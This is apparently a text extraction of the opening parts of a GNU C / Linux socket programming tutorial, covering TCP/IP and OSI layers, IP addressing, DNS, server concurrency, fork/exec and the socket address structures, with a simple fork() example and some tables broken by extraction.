Вы находитесь на странице: 1из 168

C & LINUX SOCKET: README FIRST

Well, here is another TCP/IP network programming but here we are using GNU C on Linux/Fedora Core platform. This tutorial provides quite a complete discussion presented in graphically manner with working program examples from the very basic networking up to the packet level. You need to have some knowledge and skill in C programming language and also familiar with Linux/Fedora Core platform in order to have a good start. The program examples given include the client and server codes but you can test the client and server codes at the same computer. Don't worry about the GNU C, it still based on the Standard C (ISO/IEC). The compiler used is GCC (GNU Compiler Collection) and run on the Linux/Fedora Core 3 platform. You can find the how-to compile using GCCand G++ (for C++) in GCC & G++ 1 and GCC & G++ 2. The GDB (GNU Debugger) debugger how-to also included. Tenouk need to learn the Linux socket because of the knowledge that needed in order to learn and understand the buffer overflow problem when doing the C and C++ coding.

C and Linux Socket Topics


Each topic provide notes and working program examples, from the fundamentals up to the four TCP/IP stacks. Packet level programming that cover the TCP, UDP, IP and other dominant protocols also included. Those code examples have been run on server and client machine to demonstrate the functionalities through the program output. Topics have been arranged in a proper learning curve.

1. 2. 3.

GNU C Programming Socket: Part 1 - Background story GNU C Programming Socket: Part 2 - More on design considerations

GNU C Programming Socket: Part 3 - Server issues such as Iterative vs concurrency GNU C Programming Socket: Part 4 - Header and APIs GNU C Programming Socket: Part 5 - More on headers and APIs GNU C Programming Socket: Part 6 - Story & Examples GNU C Programming Socket: Part 7 - Story & Examples GNU C Programming Socket: Part 8 - Story & Examples GNU C Programming Socket: Part 9 - Story & Examples GNU C Programming Socket: Part 10 - Story & Examples

4. 5. 6. 7. 8. 9. 10.

11. 12. 13. 14. 15. 16. 17. 18. 19. 20. 21. 22.

GNU C Programming Socket: Part 11 - Story & Examples GNU C Programming Socket: Part 12 - Story & Examples GNU C Programming Socket: Part 13 - Story & Examples

GNU C Programming Advanced Network: Part 14 - Examples - Details TCP/IP stack GNU C Programming Advanced Network: Part 15 - Examples GNU C Programming Advanced Network: Part 16 - Examples GNU C Programming Advanced Network: Part 17 - Examples GNU C Programming Advanced Network: Part 18 - Examples Linux/Unix Security Features Internet Protocol version 6 (ipv6) Wi-fi (wireless) security features C & C++ Linux Socket Related Books

NETWORK PROGRAMMING LINUX SOCKET PART I: THE FUNDAMENTALS

Note: Program examples if any, compiled using gcc on Linux Fedora Core 3 machine with several update, as normal user. The Fedora machine used for the testing having the "No Stack Execute" disabled and theSELinux set to default configuration. The abilities that supposed to be acquired: Able to understand the basic of client-server model. Able to understand the TCP/IP suite/stack/layer. Able to understand important protocols such as TCP and UDP. Able to understand and use the Unix/Linux C language socket APIs. Able to understand and implement several simple Client and server basic designs. This Tutorial introduces a network programming using sockets. Some of the information is implementation specific but all the program examples run on Fedora 3 and compiled using gcc. The following are topics that will be covered briefly. Some Background Story. The Client-Server Model.

Concurrent Processing. Programming Interface. The Socket Interface. Client Design. Example Clients. Server Design. Iterative, Connectionless Servers (UDP). Iterative, Connection-Oriented Servers (TCP). Concurrent, Connection-Oriented Servers (TCP). Single-Process, Concurrent Servers (TCP). Multi protocol Servers. Multi service Servers. Managing Server Concurrency. Client Concurrency. Some Background Story This background story tries to introduce the terms used in network programming and also to give you the big picture. The following figure is a typical physical network devices connection.

Figure 1 Using a simple network shown in the above Figure, let trace the data stream flow from Network A to Network B, by assuming that Network A is company As network and Network B is company Bs network. Physically, the flow of the data stream is from a computer in Network A (source) will go through the hub, switch and router. Then the stream travel through the carrier such as Public Switch Telephone Network (PSTN) and leased line (copper, fiber or wireless satellite) and finally reach Network Bs router, go through the switch, hub and finally reach at the computer in company B (destination). And from the previous network devices layout, the OSI (Open System Interconnection) 7 layer stack mapping is shown below.

Figure 2 From the Application layer of a computer at company A go downward the layer until the Physical (medium such as Cat 5 cable) layer, then exit Network A through the Network (router) layer in the middle of the diagram. After traveling through the carrier, reaches at the Network (router) layer of company B, travels through the Physical layer, goes upward until reaching at the Application layer of the computer at company B. Actually, at company B (the destination), the data flows through the network devices in the reverse manner compared to what happened at company A (the source). In contrast to TCP/IP, the OSI approach started from a clean slate and defined standards, adhering tightly to their own model, using a formal committee process without requiring implementations. Internet protocols use a less formal but more practical engineering approach, where anybody can propose and comment on Request For Comment (RFC) documents, and implementations are required to verify feasibility. The OSI protocols developed slowly, and because running the full protocol stack is resource intensive, they have not been widely deployed, especially in the desktop and small computer market. In the meantime, TCP/IP and the internet were developing rapidly, with deployment occurring at a very high rate, which is why the TCP/IP suite becomes a de facto standard. The OSI layer and their brief functionalities are listed in the following Table. OSI Layer Function provided Application Network application such as file transfer and terminal emulation Presentation Data formatting and encryption. Session Establishment and maintenance of sessions. Transport Provision for end-to-end reliable and unreliable delivery. Network Delivery of packets of information, which includes routing.

Data Link Physical

Transfer of units of information, framing and error checking. Transmission of binary data of a medium.

Table 1 In the practical implementation, the standard used is based on TCP/IP stack. This TCP/IP stack is a de facto standard, not a pure standard but it is widely used and adopted. The equivalent or mapping of the OSI and TCP/IP stack is shown below. It is divided into 4 layers. The Session, Presentation and Application layers of OSI have been combined into one layer, Application layer. Physical and data link layers also become one layer. Different books or documentations might use different terms, but the 4 layers of TCP/IP are usually referred.

Figure 3 In this Tutorial we will concentrate more on the Transport and Network layer of the TCP/IP stack. More detail TCP/IP stack with typical applications is shown below.

Figure 4

The following figure is a TCP/IP architectural model. Frame, packet and message are same entity but called differently at the different layer because there are data encapsulations at every layer.

1. 2. 3. 4. 5. 6. 7. 8.

Figure 5 The common applications that you encounter in your everyday use are:
FTP (file transfer protocol). SMTP (simple mail transfer protocol). telnet (remote logins). rlogin (simple remote login between UNIX machines). World Wide Web (built on http) and https (secure http). NFS (network filing system originally for Sun Microsystems). TFTP (trivial file transfer protocol used for booting). SNMP (simple network management protocol).

The user interfaces developed (programs) for the communication should depend on the platform. In computing field, a protocol is a convention or standard rules that enables and controls the connection, communication and data transfer between two computing endpoints. Protocols may be implemented by hardware, software, or a combination of the two. At the lowest level, a protocol defines the behavior of a hardware connection. In term of controls, protocol may provide data transfer reliability, resiliency and integrity. An actual communication is defined by various communication protocols. In the context of data communication, a network protocol is a formal set of rules, conventions and data structure that governs how computers and other network devices exchange information over a network.

Protocol

In other words, protocol is a standard procedure and format that two data communication devices must understand, accept and use to be able to talk to each other. A wide variety of network protocols exist, which are defined by many standard organizations worldwide and technology vendors over years of technology evolution and developments. One of the most popular network protocol suites is TCP/IP, which is the heart of internetworking communications. TCP and UDP protocols were built on top of the IP protocol. Basic for the TCP:
Transmission Control Protocol is defined by RFC-793. TCP provides connection-oriented transport service and reliable. End-to-end transparent byte-stream. E.g.: FTP, telnet, http, SMTP.

TCP and UDP Protocols


1. 2. 3. 4. 1. 2. 3. 4. 5.

While the UDP:


User Datagram Protocol is defined by RFC-768. UDP provides datagram service that is a packet based. Connectionless. Unreliable. E.g.: NFS, TFTP. Port numbers and services

It is 16 bit integers. So we have 216 = 65536 ports maximum. It is unique within a machine/IP address. Every service/application/daemon will have their own port number. To make a connection we need an IP address and port number of the protocol. The connection defined by: Normally, server port numbers are low numbers in the range 1 1023, normally called well known port number and normally assign for root (Administrator) only. It is used for authentication e.g. rlogin. And normally, client port numbers are higher numbers starting at 1024. A server running on a well-known port lets the OS know what port it wants to listen on. Whereas a client normally simply lets the operating system picks a new port that isnt already in use.
Numeric IP Addresses

IP address & port of server + IP address & port of client


Ipv4 (Internet Protocol version 4) Internet address is 32 bit integers. The IP stand for Internet Protocol. For convenience they are displayed in "dotted decimal" format. Each byte is presented as a decimal number. Dots separate the bytes, for example:
IP Address Classes

131.95.115.204

To simplify packet routing, internet addresses are divided into classes. An IP address has two parts: The network portion and the host portion. The network portion is unique to each company/organization/domain/group/network, and the host portion is unique to each network device (host) in the network. Where the network portion ends and the host portion begin is different for each class of IP address. You can determine this by looking at the two high-order bits in the IP address.
192.168.1.100

xxxxxxxx.xxxxxxxx.xxxxxxxx.xxxxxxxx Byte 1.Byte 2.Byte 3.Byte 4


Class and Network size Class A (Large) Class B (Medium) Class C (Small) Range (decimal) 1 -127 128 191 192 223 Network ID Byte 1 Bytes 1, 2 Bytes 1, 2, 3 Host ID Bytes 2, 3, 4 Bytes 3, 4 Bytes 4

Table 2

The first four bits (bits 0-3) of an address determine its class:

= class A - bits 1-7 define a network. bits 8-31 define a host on that network. So we've128 networks with 16 million hosts.

= class B - bits 2-15 define a network. bits 16-31 define a host on that network. So we've 16384 networks with 65536 hosts.

= class C - bits 3-23 define a network. bits 24-31 define a host on that network. So we've 2 million networks with 256 hosts.

Table 3

The IP network portion can represent a very large network that may spans multiple geographic sites. To make this situation easier to manage, you can use subnetworks. Subnetworks use the two parts of the address to define a set of IP addresses that are treated as group. The subnetting divides the address into smaller networks. You configure a subnetwork by defining a mask, which is a series of bits. Then, the system performs a logical AND operation on these bits and the IP address. The 1 bit defines the subnetwork portion of the IP address (which must include at least the network portion). The 0 bits define the host portion. Class D is a multicast address and class E is reserved.

As a summary:

Figure 6

Nowadays we use classless IP address. That means we subnet the class type IP into smaller subnet or smaller group of IP addresses creating smaller networks. The example can be found in Classless Inter-Domain Routing (CIDR) and the private domain normally uses the private IP range. The private IP range cannot be routed in the Internet domain. A network technology that deploy the private IP is Virtual Private Network (VPN) while the advanced subnetting technology using private IP can be found in Virtual LAN (VLAN). Before the IPV4 run out of the IP addresses, now we have IPV6 with 128 bits. Host Names and DNS People need names to make it simpler to use the Internet instead of the dotted decimal. The Domain Name System (DNS) can translate from name (domain name) to number (IP address) or from number to name. This is called name resolution. Name resolution done by Domain Name Service (DNS although the term is same as the Domain Name System and same acronym, this is Microsoft implementation of the Domain Name System) in Windows and in Unices/Linux it is implemented using Berkeley Internet Name Domain (BIND). Ethernet Addresses MAC and ARP protocol In Local Area Network (LAN), based on the architecture, we have several network types such as Ethernet and Token Ring. The most widely used is Ethernet. Each Ethernet interface (Network Interface Card -NIC) has a unique Ethernet address provided by the manufacturer, hard coded into the NIC, normally called Media Access Control (MAC) or physical address. Ethernet addresses are 6 bytes shown as 6 hexadecimal values separated by colons. For example: 00:C0:F0:1F:3C:27. You can see this MAC address by issuing the arp or ipconfig or ifconfig (Linux) command as shown below:

Figure 7

Figure 8

Ethernet packets have header and data sections. The header contains the source and destination of the Ethernet addresses (MAC) and a 2 byte packet type.

For IP packets the data area contains the IP fields which hold the IP source and destination addresses that are readable and more suitable for human. To send to an IP address, a computer uses the Address Resolution Protocol (arp) to determine a MAC address. IPv6 - Internet Protocol version 6 Current IP is IPv4 (Internet Protocol version 4). IPv4 has 32 bit addresses. Due to splitting addresses, 32 bits is not enough. IPv6 will have 128 bit addresses. Addresses will be shown in a colon hexadecimal format with internal strings of 0s omitted. For example:
69DC:88F4:FFFF:0:ABCD:DBAC:1234:FBCD:A12B::F6

New service types exist to accommodate IPv6 such as in multimedia and wireless fields. In Windows Xp and above, you can try the ipv6 command at the prompt to view and/or set the IPv6 configuration. For example:ipv6 if.

Figure 9

Figure 10 Distributed Applications The goal is to hide the fact that the application is distributed other than to provide the redundancy for reliability. User interfaces can look identical. Typically data resides on remote systems. In many instances, remote users interact with each other. Application Protocols Protocol is a set of rules defining how to communicate. Application protocol: communication rules for an application. Standard protocols: documented in RFCs such as ftp, telnet, http. Non-standard protocols: programmers write a distributed application = new protocol. Programmers choose standard protocols where they apply. E.g. telnet:
telnet computer.some.where [port_number] telnet www.yahoo.com 23

Port is a number defining which service to connect to. For example, port 23 is the default for telnet services. In Linux, ports, protocols and service names are specified in /etc/services.

We will learn more detail regarding the port, protocol and service another Modules. Providing Concurrent Access to Services Users expect almost immediate response. Network servers must handle multiple clients "apparently simultaneously". The CPU resources and network must be shared. Normally in the form of multiple server's processes or multiple server's threads in one process.
Continue on next ModuleMore in-depth discussion about TCP/IP suite is given in Advanced TCP/IP Tutorials.

NETWORK PROGRAMMING LINUX SOCKET PART 2: THE SERVER SIDE ISSUES


Note: Program examples if any, compiled using gcc on Linux Fedora Core 3 machine with several update, as normal user. The Fedora machine used for the testing having the "No Stack Execute" disabled and theSELinux set to default configuration. The Client-Server Model TCP/IP enables peer-to-peer communication. Computers can cooperate as equals or in any desired way. Most distributed applications have special roles. For example: 1. Server waits for a client request. 2. Client requests a service from server. Some Security Definitions Authentication: verifying a computer's identity. Authorization: determining whether permission is allowed. Data security: preserving data integrity. Privacy: preventing unauthorized access. Protection: preventing abuse. These security matters have experienced quite a pretty good evolution. The standards also have been produced such as the obsolete C2, formally known as Trusted Computer System Evaluation Criteria (TCSEC) (PDF format) then superseded by Common Criteria and the ISO version: ISO 15408 Common Criteria for Information Technology Security Evaluation (another reference can be found atcommoncriteriaportal.org). Connectionless (UDP) vs Connection-Oriented (TCP) Servers Programmer can choose a connection-oriented server or a connectionless server based on their applications. In Internet Protocol terminology, the basic unit of data transfer is a datagram. This is basically a header followed by some data. The datagram socket is connectionless. User Datagram Protocol (UDP): 1. Is a connectionless.

A single socket can send and receive packets from many different computers. 3. Best effort delivery. 4. Some packets may be lost some packets may arrive out of order.
2.

Transmission Control Protocol (TCP): 1. Is a connection-oriented. 2. A client must connect a socket to a server. 3. TCP socket provides bidirectional channel between client and server. 4. Lost data is re-transmitted. 5. Data is delivered in-order. 6. Data is delivered as a stream of bytes. 7. TCP uses flow control.

It is simple for a single UDP server to accept data from multiple clients and reply. It is easier to cope with network problems using TCP. Stateless vs Stateful Servers A stateful server remembers client data (state) from one request to the next. A stateless server keeps no state information. Using a stateless file server, the client must: 1. Specify complete file names in each request. 2. Specify location for reading or writing. 3. Re-authenticate for each request.

Using a stateful file server, the client can send less data with each request. A stateful server is simpler. On the other hand a stateless server is: 1. More robust. 2. Lost connections can't leave a file in an invalid state. 3. Rebooting the server does not lose state information because there is no state information hold. 4. Rebooting the client does not confuse a stateless server.

Concurrent Processing
Concurrency

Real or apparent simultaneous processing. Time-sharing: a single CPU switches from 1 process to the next. Multiprocessing: multiple CPUs handle processes. Multiple distributed application share a network. With a single Ethernet segment or hub, one packet at a time can use the network. Network sharing is like time-sharing. With a switch, multiple packets can be in transit and transfer simultaneously, like multiprocessing. With several networks, multiple packets can be in transit and transfer like having multiple computers.

Network Concurrency

Server Concurrency

An iterative server finishes one client request before accepting another. An iterative telnet daemon is almost useless. Concurrent servers are difficult to write. We will consider several designs for concurrency.

Programs vs Processes

Program: executable instructions. Process: program being executed. Each process has its own private data. e.g.: Multiple pico processes have different text on the screen.
Concurrency using fork() in UNIX/Linux /* testpid.c */ #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <sys/types.h> #include <sys/wait.h>

int main (int argc, char **argv) { int i, pid; pid = fork();

printf("Forking...the pid: %d\n", pid); for (i = 0; i < 5; i++) printf(" %d if (pid) wait(NULL); return 0; } %d\n", i, getpid());

[bodo@bakawali testsocket]$ gcc -g testpid.c -o testpid [bodo@bakawali testsocket]$ ./testpid Forking...the pid: 0 0 1 2 3 4 27166 27166 27166 27166 27166

Forking...the pid: 27166 0 1 2 3 4


27165 27165 27165 27165 27165

New process starts execution by returning from fork(). Child and parent are nearly identical. Parent gets the child process id from fork(). Child gets 0 back from fork(). Parent should wait for child to exit. Round robin technique. Operating system is interrupted regularly by a clock. In the clock interrupt handler the kernel checks to see if the current process has exceeded its time quantum. Processes are forced to take turns using the CPU but every process will get their time slice. The following are exec family prototypes.

Time slicing

Using exec family to execute a new program in UNIX/Linux

int execve(const char *file, char *const argv [ ], char *const envp[ ]); int execl(const char *path, const char *arg, ...);

int execlp(const char *file, const char *arg, ...); int execle(const char *path, const char *arg, ..., char * const envp[ ]); int execv(const char *path, char *const argv[ ]); int execvp(const char *file, char *const argv[ ]);

exec family executes a new program (same process id). The first argument is the new program if it says path, it requires a full pathname otherwise, and it searches in the current path. Program arguments follow as a list or a vector. execve() and execle() allow specifying the environment. Having multiple server processes means context switches. A context switch consumes CPU time. Other processes are blocked during that time. We must consider the benefits of multiple servers versus the overhead.

Context Switching

Asynchronous I/O

Asynchronous (instead of synchronous) I/O means allowing a process to start an I/O operation and proceeding with other work while the I/O occurs. Another term used is non-blocking (instead of blocking). Obviously, asynchronous/non-blocking provides more robust and efficient way for concurrent connection. UNIX I/O occurs asynchronously if you use select(). A process asks the select() system call to tell which of a collection of file descriptors is ready to finish I/O. After calling select() the process can call read() or write() to perform I/O which is at that time no more than a copying of data to/from kernel space with real I/O either already done or scheduled for later. A server process can use select() to determine which of a collection of sockets it can read without blocking. Programming Interfaces
TCP/IP Application Programming Interface (API)

API: routines supplied by the OS defining the interface between an application and the protocol software. Better to avoid vendor-specific data format and features, use standard APIs for portability. The API only suggests required functionality and it depend on the implementation. For UNIX - socket (original Berkeley system calls) and TLI (Transport Layer Interface - AT&T UNIX System V).

For Apple Mac MacTCP. For MS Windows Winsock (still based on the Berkeley socket) and Winsock in .NET. There is also other TCP/IP APIs that implementation dependent. Unices TCP/IP APIs are kernel system calls. Mac and Windows using extension/drivers and dynamic link library (dll). In this Tutorial we will use socket APIs and in general socket refer to socket APIs that includes the socket(). In fact the APIs just routines/functions in C language.

Required Functionality

Allocate resources for communication such as memory. Specify local and remote endpoints. Initiate a client connection. Wait for a client connection. Send or receive data. Determine when data arrives. Generate urgent data. Handle received urgent data. Terminate a connection. Abort. Handle errors. Release resources. System Calls An operating system should run user programs in a restricted mode i.e. user program should not do I/O directly. User programs should make a system call to allow trusted code to perform I/O. In UNIX, functions like open(), read(), write(), close() are actually system calls. A UNIX system call is a transition from user mode to kernel mode. TCP/IP code is called through the system calls.
UNIX I/O with TCP/IP

To a certain degree, I/O with sockets is like file I/O. TCP/IP sockets are identified using file descriptors. read() and write() work with TCP/IP sockets. open() is not adequate for making a connection. Calls are needed to allow servers to wait for connections. UDP data is always a datagram and not a stream of bytes. The Socket Interface Socket is an Application Programming Interface (API) used for Interprocess Communications (IPC). It is a well defined method of connecting two processes, locally or across a network. It is a Protocol and Language Independent. Often referred to as Berkeley Sockets or BSD Sockets. The following figure illustrates the example of client/server relationship of the socket APIs for connection-oriented protocol (TCP).

Figure 8 The following figure illustrates the example of client/server relationship of the socket APIs for a connectionless protocol (UDP).

Figure 9 Berkeley Sockets: API for TCP/IP Communication

Uses existing I/O features where possible. Allows TCP/IP connections, internal connections, and possibly more. Started in BSD UNIX in the 1980s. BSD UNIX adopted by Sun, Tektronix and Digital. Now the socket interface is a de facto standard. Sockets make the network look much like a file system. Socket Descriptors UNIX open() yields a file descriptor: a small integer used to read/write a file. UNIX keeps a file descriptor table for each process an array of pointers to the data about the open files. A file descriptor is used to index the array. Sockets are added to this abstraction. The socket() system call returns a socket descriptor. Actually, files and sockets are accessed using the same table. The structure pointed to by a table entry has a field which tells whether it is a file or socket. System Data Structures for Sockets In order to use a socket, the kernel needs to keep track of several pieces of data as the following: 1. Protocol Family: a parameter to the socket call. 2. Service Type (Stream, Datagram): parameter to socket. 3. Local IP Address: can be set with bind(). 4. Local Port: can be set with bind(). 5. Remote IP Address: can be set with connect(). 6. Remote Port: can be set with connect().
Ultimately all 6 values must be known to 'make' the communication. Active vs Passive Sockets A server uses a passive socket to wait the client connections. A client uses an active socket to initiate a connection. Both start using the socket() call. Later on, servers and clients will use other calls. Socket Endpoints TCP/IP communication occurs between 2 endpoints. An endpoint is defined as an IP address and a port number. To allow other protocols to merge into the socket abstraction, address families are used. We will use PF_INET for internet protocol family. We will also use AF_INET for internet address family. Normally PF_INET = AF_INET = 2. Socket types for AF_INET are listed in the following Table. Socket type Protocol TYPE TCP, Systems Network Architecture (SNA-IBM), Sequenced STREAM SOCK_STREAM Packet eXchange (SPX-Novell). SEQPACKET SOCK_SEQPACKET SPX. DGRAM SOCK_DGRAM UDP, SNA, Internetwork Packet eXchange (IPX-Novell). RAW SOCK_RAW IP.

Table 4: AF_INET socket combinations There are other address families that you will find somewhere and sometime such as: 1. AF_UNIX 2. AF_NS 3. AF_TELEPHONY

AF_UNIX address family The system uses this address family for communicating between two programs that are on the same physical machine. The address is a path name to an entry that is in a hierarchical file system. Sockets with address family AF_UNIX use the sockaddr_un address structure: struct sockaddr_un { short sun_family; char sun_path[126]; }; The sun_family field is the address family. The sun_path field is the pathname. The <sys/un.h> header file contains the sockaddr_un address structure definition. For the AF_UNIX address family, protocol specifications do not apply because protocol standards are not involved. The communications mechanism between the two processes on the same machine is specific to that machine. AF_NS address family This address family uses addresses that follow Novell or Xerox NS protocol definitions. It consists of a 4-byte network, a 6-byte host (node), and a 2-byte port number. Sockets with address family AF_NS use the sockaddr_ns address structure: struct sockaddr_ns { unsigned short sns_family; struct ns_addr sns_addr; char sns_zero[2]; };

AF_TELEPHONY address family Telephony domain sockets (sockets that use the AF_TELEPHONY address family) permit the user to initiate (dial) and complete (answer) telephone calls through an attached ISDN telephone network using standard socket APIs. The sockets forming the endpoints of a connection in this domain are really the called (passive endpoint) and calling (active endpoint) parties of a telephone call. The AF_TELEPHONY addresses are telephone numbers that consist of up to 40 digits (0 - 9), which are contained in sockaddr_tel address structures. The system supports AF_TELEPHONY sockets only as connection-oriented (type SOCK_STREAM) sockets. Keep in mind that a connection in the telephony domain provides no more reliability than that of the underlying telephone connection. If guaranteed delivery

is desired, you must accomplish this at the application level, such as in fax applications that use this family. Sockets with address family AF_TELEPHONY use the sockaddr_tel address structure. struct sockaddr_tel { short stel_family; struct tel_addr stel_addr; char stel_zero[4]; }; The telephony address consists of a 2-byte length followed by a telephone number of up to 40 digits (0 - 9). struct tel_addr { unsigned short t_len; char t_addr[40]; };

The stel_family field is the address family. The stel_addr field is the telephony address, and stel_zero is a reserved field. The <nettel/tel.h> header file contains the tel_addr and sockaddr_tel structure definitions.

NETWORK PROGRAMMING LINUX SOCKET PART 3: MORE ON APIs


Note: Program examples if any, compiled using gcc on Linux Fedora Core 3 machine with several update, as normal user. The Fedora machine used for the testing having the "No Stack Execute" disabled and theSELinux set to default configuration. Generic Socket Address Structure Host IP Addresses Each computer on the Internet has one or more Internet addresses, numbers which identify that computer among all those on the Internet. Users typically write numeric host addresses as sequences of four numbers, separated by periods, as in 128.54.46.100. Each computer also has one or more host names, which are strings of words separated by periods, as in www.google.com. Programs that let the user specify a host typically accept both numeric addresses and host names. But the program needs a numeric address to open a connection; to use a host name; you must convert it to the numeric address it stands for. Internet Host Addresses Abstract Host Address Each computer on the Internet has one or more Internet addresses, numbers which identify that computer among all those on the Internet. An Internet host address is a number containing four bytes of data. These are divided into two parts, a network number and a local network address number within that network. The network number consists of the first one, two or three bytes; the rest of the bytes are the local address.

Network numbers are registered with the Network Information Center (NIC), and are divided into three classes as discussed before: class A, B, and C for the IPv4. The local network address numbers of individual machines are registered with the administrator of the particular network. Since a single machine can be a member of multiple networks, it can have multiple Internet host addresses. However, there is never supposed to be more than one machine with the same host address. There are four forms of the standard numbers-and-dots notation for Internet addresses as discussed before: 1. a.b.c.d - This specifies all four bytes of the address individually. 2. a.b.c - The last part of the address, c, is interpreted as a 2-byte quantity. This is useful for specifying host addresses in a Class B network with network address number a.b. 3. a.b - The last part of the address, c, is interpreted as a 3-byte quantity. This is useful for specifying host addresses in a Class A network with network address number a. 4. a - If only one part is given, this corresponds directly to the host address number.

Within each part of the address, the usual C conventions for specifying the radix apply. In other words, a leading '0x' or '0X' implies hexadecimal radix; a leading '0' implies octal; and otherwise decimal radix is assumed. Host Address Data Type - Data type for a host number. Internet host addresses are represented in some contexts as integers (type unsigned long int). In other contexts, the integer is packaged inside a structure of type struct in_addr. It would be better if the usages were made consistent, but it is not hard to extract the integer from the structure or put the integer into a structure. The following basic definitions for Internet addresses appear in the header file 'in.h'. struct in_addr This data type is used in certain contexts to contain an Internet host address. It has just one field, named s_addr, which records the host address number as an unsigned long int. unsigned long int INADDR_LOOPBACK You can use this macro constant to stand for the ''address of this machine'' instead of finding its actual address. It is the Internet address '127.0.0.1', which is usually called 'localhost'. This special constant saves you the trouble of looking up the address of your own machine. Also, the system usually implements INADDR_LOOPBACK specially, avoiding any network traffic for the case of one machine talking to itself. unsigned long int INADDR_ANY You can use this macro constant to stand for ''any incoming address'' when binding to an address. This is the usual address to give in the sin_addr member of struct sockaddr_in when you want your server to accept Internet connections.

unsigned long int INADDR_BROADCAST This macro constant is the address you use to send a broadcast message. unsigned long int INADDR_NONE This macro constant is returned by some functions to indicate an error. Host Address Functions - Functions to operate on them These additional functions for manipulating Internet addresses are declared in 'arpa/inet.h'. They represent Internet addresses in network byte order; they represent network numbers and local-address-within-network numbers in host byte order. int inet_aton(const char *name, struct in_addr *addr) This function converts the Internet host address name from the standard numbers-and-dots notation into binary data and stores it in the struct in_addr that addr points to. inet_aton returns nonzero if the address is valid, zero if not. unsigned long int inet_addr(const char *name) This function converts the Internet host address name from the standard numbers-and-dots notation into binary data. If the input is not valid, inet_addr returns INADDR_NONE. This is an obsolete interface to inet_aton, described above; it is obsolete because INADDR_NONE is a valid address (255.255.255.255), and inet_aton provides a cleaner way to indicate error return. unsigned long int inet_network(const char *name) This function extracts the network number from the address name, given in the standard numbers-and-dots notation. If the input is not valid, inet_network returns -1. char * inet_ntoa(struct in_addr addr) This function converts the Internet host address addr to a string in the standard numbers-and-dots notation. The return value is a pointer into a staticallyallocated buffer. Subsequent calls will overwrite the same buffer, so you should copy the string if you need to save it. struct in_addr inet_makeaddr(int net, int local) This function makes an Internet host address by combining the network number net with the local-address-within-network number local. int inet_lnaof(struct in_addr addr) This function returns the local-address-within-network part of the Internet host address addr. Function int inet_netof(struct in_addr addr) This function returns the network number part of the Internet host address addr. Host Names - Translating host names to host IP numbers Besides the standard numbers-and-dots notation for Internet addresses, you can also refer to a host by a symbolic name. The advantage of a symbolic name is that it is usually easier to remember. For example, the machine with Internet address '128.52.46.32' is also known as 'testo.google.com'; and other machines in the 'google.com' domain can refer to it simply as 'testo'.

Internally, the system uses a database to keep track of the mapping between host names and host numbers. This database is usually either the file '/etc/hosts' or an equivalent provided by a name/DNS server. The functions and other symbols for accessing this database are declared in 'netdb.h'. They are BSD features, defined unconditionally if you include 'netdb.h'. The IP address to name and vice versa is called name resolution. It is done by Domain Name Service. Other than the hosts file, in Windows platform it is called DNS (Domain Name Service) and other Microsoft specifics may use WINS or lmhost file. Keep in mind that the general term actually Domain Name System also has DNS acronym. In UNIX it is done by BIND. The complete process or steps taken for name resolution quite complex but Windows normally use DNS service and UNIX/Linux normally use BIND.
Data Type struct hostent

This data type is used to represent an entry in the hosts database. It has the following members:
Description

e This is the ''official'' name of the host.

iases

These are alternative names for the host, represented as a null-terminated vector of strings.

ype

This is the host address type; in practice, its value is always AF_INET. In principle other kinds of addresses could be the data base as well as Internet addresses; if this were done, you might find a value in this field other thanAF_INET This is the length, in bytes, of each address. This is the vector of addresses for the host. Recall that the host might be connected to multiple networks and have addresses on each one. The vector is terminated by a null pointer. This is a synonym for h_addr_list[0]; in other words, it is the first host address.

st

Table 5

As far as the host database is concerned, each address is just a block of memory h_length bytes long. But in other contexts there is an implicit assumption that you can convert this to a struct in_addr or an unsigned long int. Host addresses in a struct hostent structure are always given in network byte order. You can use gethostbyname() or gethostbyaddr() to search the hosts database for information about a particular host. The information is returned in a staticallyallocated structure. You must copy the information if you need to save it across calls.
struct hostent * gethostbyname(const char *name)

The gethostbyname() function returns information about the host named name. If the lookup fails, it returns a null pointer.
struct hostent * gethostbyaddr(const char *addr, int length, int format)

The gethostbyaddr() function returns information about the host with Internet address addr. The length argument is the size (in bytes) of the address at addr. format specifies the address format; for an Internet address, specify a value of AF_INET. If the lookup fails, gethostbyaddr() returns a null pointer. If the name lookup by gethostbyname() or gethostbyaddr() fails, you can find out the reason by looking at the value of the variable h_errno. Before using h_errno, you must declare it like this:
extern int h_errno;

Here are the error codes that you may find in h_errno:
Description

no

_FOUND No such host is known in the data base.


This condition happens when the name server could not be contacted. If you try again later, you may succeed then. A non-recoverable error occurred. The host database contains an entry for the name, but it doesn't have an associated Internet address.

ERY

SS

Table 6

You can also scan the entire hosts database one entry at a time using sethostent(), gethostent(), and endhostent(). Be careful in using these functions, because they are not reentrant.
Function void sethostent(int stayopen)

This function opens the hosts database to begin scanning it. You can then call gethostent() to read the entries. If the stayopen argument is nonzero, this sets a flag so that subsequent calls to gethostbyname() or gethostbyaddr() will not close the database (as they usually would). This makes for more efficiency if you call those functions several times, by avoiding reopening the database for each call.
Function struct hostent * gethostent()

This function returns the next entry in the hosts database. It returns a null pointer if there are no more entries.
Function void endhostent()

This function closes the hosts database.

The API Details

In this section and that follows we will discuss the socket APIs details: the structures, functions, macros and types. struct sockaddr struct sockaddr { u_char sa_len;
u_short sa_family; char sa_data[14]; // address family, AF_xxx // 14 bytes of protocol address

};
1.

sockaddr consists of the following parts:

The short integer that defines the address family (the value that is specified for address family on the socket() call). 2. Fourteen bytes that are reserved to hold the address itself.

Originally sa_len was not there. Depending on the address family, sa_data could be a file name or a socket endpoint. sa_family can be a variety of things, but itll be AF_INET for everything we do in this Tutorial. sa_data contains a destination address and port number for the socket. This is rather unwieldy since you dont want to tediously pack the address in the sa_data by hand. To deal with struct sockaddr, programmers created a parallel structure: struct sockaddr_in ("in" for "Internet".) struct sockaddr_in struct sockaddr_in { u_char sin_len;
u_short sin_family; u_short sin_port; struct char in_addr sin_addr; sin_zero[8]; // Address family // Port number // Internet or IP address // Same size as struct sockaddr

};

The sin_family field is the address family (always AF_INET for TCP and UDP). The sin_port field is the port number, and the sin_addr field is the Internet address. The sin_zero field is reserved, and you must set it to hexadecimal zeroes. Data type struct in_addr - this data type is used in certain contexts to contain an Internet host address. It has just one field, named s_addr, which records the host address number as an unsigned long int. sockaddr_in is a "specialized" sockaddr. sin_addr could be u_long.

sin_addr is 4 bytes and 8 bytes are unused. sockaddr_in is used to specify an endpoint. The sin_port and sin_addr must be in Network Byte Order.

Socket System Calls

socket()

